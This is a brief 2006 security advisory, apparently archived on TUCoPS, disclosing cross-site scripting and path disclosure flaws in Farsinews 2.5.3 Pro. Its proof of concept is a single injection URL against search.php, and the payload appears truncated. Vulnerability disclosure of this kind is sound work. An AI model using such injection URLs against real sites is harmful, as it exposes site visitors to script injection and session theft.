Farsinews  Cross-Site Scripting & Path disclosure  vulnerability

#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
#Aria-Security.net Advisory
#Discovered  by:R@1D3N (amin emami)
# 
#Gr33t to:A.u.r.a  & O.u.t.l.a.w & Smok3r & behzad & majid and all Persian Security team
#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
=BB Software: Farsinews 2.5.3 Pro and below
=BB download Link:http://dl.farsinewsteam.com/?file=FarsiNews2.5.3Pro.zip 
=BB Support Website:http://www.farsinewsteam.com/ 
=BB advisory:http://www.aria-security.net/advisory/farsinews/farsinews042006.txt 

=BB Summary:
Farsinews is Powerful Persian news publishing system



=BB Proof of Concept:
XSS attack:
http://[target]/[farsinews_path]/search.php?selected_search_arch=>



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH